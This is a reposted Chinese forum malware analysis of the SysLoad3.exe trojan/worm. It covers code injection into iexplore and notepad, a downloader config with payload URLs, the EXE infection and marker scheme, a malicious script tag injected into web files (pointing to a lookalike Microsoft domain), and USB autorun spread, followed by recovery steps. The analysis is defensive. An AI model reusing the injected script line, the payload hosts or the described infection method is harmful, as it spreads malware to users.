SysLoad3.exe木马

瑞星定义名为：Worm.DlOnlineGames
卡巴斯基定义名为：Trojan-Downloader.Win32.Agent
金山毒霸定义名为：Worm.MyInfect
赛门铁克定义名为：W32.Fubalca
驱逐舰定义名为：DLoader.Trojan

中文俗名“卖英”

转载自水木社区网友coding的大作
[url]http://codinggg.spaces.live.com/blog/cns!8FF03B6BE1F29212!689.entry[/url]

适用于SysLoad3.exe V1.0.6版本：用于恢复被感染EXE程序，对于其他被感染的asp,aspx,htm,html,jsp,php文件，简单的替换掉特征串大概就可以了吧
       [url]http://mumayi1.999kb.com/pic/2007-04-02/b6z4d6al8r5e9d6t44dn.rar[/url]

         注意：空间不支持exe格式，请下载后把后缀由rar改成exe。

         使用前，请先断网，删除系统目录下的SysLoad3.exe以及1.exe,2.exe,...,7.exe，用IceSword删除临时目录下的那几个动态库。当任务管理器里没有iexplore.exe和notepad.exe的进程时，就可以运行这个恢复程序了。 

特别注意：运行过程中，不要去运行其他程序，有可能你运行的那个程序就是带毒的！！ 

昨天下午加班回来，发现本本的行为相当诡异。看了看任务管理器，有几个Ie的进程和几个Notepad的进程有些可疑。然后看了看注册表，加了启动项：SysLoad3.exe，在Windows系统目录下面。唉，我是不用杀毒软件的，一般中了木马都是随便杀杀就完了，然而这个木马很讨厌，明显影响使用。木马程序做的这么土，也太匪夷所思了。用户都知道有干扰了，还怎么木马啊！不知道作者怎么想的~~

既然这么讨厌，那就干死他！不罗嗦，IDA伺候。我分析的是1.0.6版，程序逻辑比较简单，看看他都干啥了~~
       1. 一开始是在注册表中创建一个启动项: System Boot Check，调整到Debug权限，然后创建一个iexplore.exe的进程和一个Notepad.exe的进程。

2.自然是要把代码注入到远程进程去啦~~，作者注入的方式比较简单。设计的时候就把自己的加载地址改了，没用0x400000，而是用了一个很不常见的地址（0x13150000)，估计是用notepad和iexplore都测试过，可以确认该地址不会被占用。然后根据PE的信息取出需要的空间大小(0x7000)，从iexplore和notepad里分配该空间，最后把整个程序都copy过去，地址修正这些就全都免了。最后当然是木马最爱的函数CreateRemoteThread拉~~

3.嗯，干完活以后，sysload3.exe就没事干了。接下来就是iexplore和notepad大显身手~。

4.首先是iexplore干活，这个时候notepad也有一个重要的任务。它要检查看自己是本体还是被感染体。如果是被感染体，则需要把感染前的程序放出来干活，这样才不至于被用户发现。然后线程就等通知(Named Event: MySignal)。这个时候iexplore在干吗呢？接着看。

5.Iexplore(名字真长，后面叫IE好了~)先创建一个命名Mutex:MyDownload,告诉后面来的兄弟：有我在，你们都休息吧~。然后创建MySignal Event，置为无信号状态。接下来正式开始干活：IE的任务就是把病毒文件最新的配置信息取下来，根据新的配置信息更新本地的病毒版本。先是从[url]http://a.2007ip.com/css.css[/url]下载配置文件，保存在本地的名字就叫config.ini。
       配置文件的格式及注释如下：
       [config]
       Version=1.0.6
       NUM=7     ;这里指出下面有多少个任务(最多20个），每个任务都是把文件取下来，存在本地的名字就是同名的exe
       1=http://61.153.247.76/cald/01.gif
       2=http://61.153.247.76/cald/02.gif
       3=http://61.153.247.76/cald/03.gif
       4=http://61.153.247.76/cald/04.gif
       5=http://61.153.247.76/cald/05.gif
       6=http://61.153.247.76/cald/06.gif
       7=http://61.153.247.76/cald/07.gif
       UpdateMe=http://a.2007ip.com/5949645046.exe ;更新sysload3.exe本身
       tongji=http://if.iloveck.com/test/tongji.htm           ;唉，统计，作者就觉得这东西这么NB？还要统计一下。。。。
       hos=http://if.iloveck.com/test/hos.gif     ;这里非常出彩！作者苦心收集了一大堆流氓网站的名字，给我们种木马的时候，顺便给我
们把这些网站也给屏蔽了。全都记录在hosts文件里面，都解析成本地！虽然不清楚作者的本意是为了打击竞争对手(其他木马，嘿嘿~）或者是真的为人民服务，无论如何，赞作者~~！！虽然木马杀了，这个功能我还是会继续使用的，估计作者还会更新~哈哈~~
     
       好，任务都完成了以后，IE同学休息休息~~

6.Nopepad粉墨登场。
         这个坏家伙一上来就不干好事儿~，从Z盘到A盘挨个来，一个不落的去感染其他文件，包括EXE，ASP，ASPX，HTM，HTML，PHP，嗯，好像就这些。这是这个木马非常让我厌恶的地方。
          A.其EXE的感染的过程如下（大家不要看了去干坏事！）：
          首先，依然是遍历所有文件。找到一个EXE后，检查它的最后4个字节是不是0x12345678。如果是，那么这个就是兄弟，下一位。
          找到一个没给感染的后干吗呢？自然就是感染他拉~~哈哈哈~~~。注意看哦，这里很关键：把sysload3.exe复制一份，叫做tempicon.exe，为啥是icon呢？不着急，马上就能看到原因了。tempicon有了以后，把目标程序的图标资源取出来，插入到tempicon里面去，这样的话，tempicon看起来就长得跟目标一样咯~。下一步呢，就是要把目标程序保存下来，于是就有了tempload.exe，这个文件就是把tempicon复制一份，然后把目标程序紧接着放在后面。最后加入8个自己的识别信息，前四个字节指出木马本身的长度，后四个字节就是前面说的0x12345678;
         B.web相关的文件的处理大同小异，临时文件是temphtml~，中间插入一个流氓javascript文件：          <script src=http://macr.microfsot.com/Noindex.js></script>

感染完整个硬盘后，就没50秒扫描一次又没有U盘，软盘之类的驱动器挂上。挂上了就在根目录下生成一个Autorun.inf，复制一份SysLoad3.exe过去，比较简单。

哦，好像检查了系统目录所在的分区没有去遍历。
     
         嗯，打完收工！

基本流程就是这样了~。要恢复的话，只要写个小程序，遍历一下硬盘里的exe，根据文件尾的标示(倒数第8-4个字节指出Sysload_Stub的长度，根据最后4个字节是否0x12345678判断是否是染毒文件)就可以恢复鸟~~~~至于其他的那些gizo0.dll,lgsy0.dll,msxo0.dll,rav20.dll之类的库，用IceSword从Explorer进程里卸载掉，然后就可以删掉啦~！
       
         总的来看，木马加入一个配置文件这个思路挺好的~新开发一个木马，就让他们去下载~呵呵。然而多次看到作者在使用CreatFile的时候，判断返回值总是用0，诡异~难道不是INVALID_HANDLE_VALUE???应该可以排除作者不知道的可能性，在FindFirstFile的用法里，作者就是用得INVALID_HANDLE_VALUE比较的。我书读得少，谁知道的话请一定留言告诉我，谢谢~~。
     
         分析过程挺麻烦的，唉~还好作者送上木马不忘附赠一个joke：I will by one BMW this year!如果作者靠这个能by到BMW，那这样一来我们的心情是不是可以愉悦很多哈~~嘿嘿~~

注意升级。

下载请到360安全网

[url]http://bbs.360safe.com/viewthread.php?tid=143311&extra=page%3D1[/url]

由于论坛系统的限制，需要注册一个360的帐号先。SORRY.

ps: CISRT的风险警告

麦英蠕虫专杀工具2 by 江民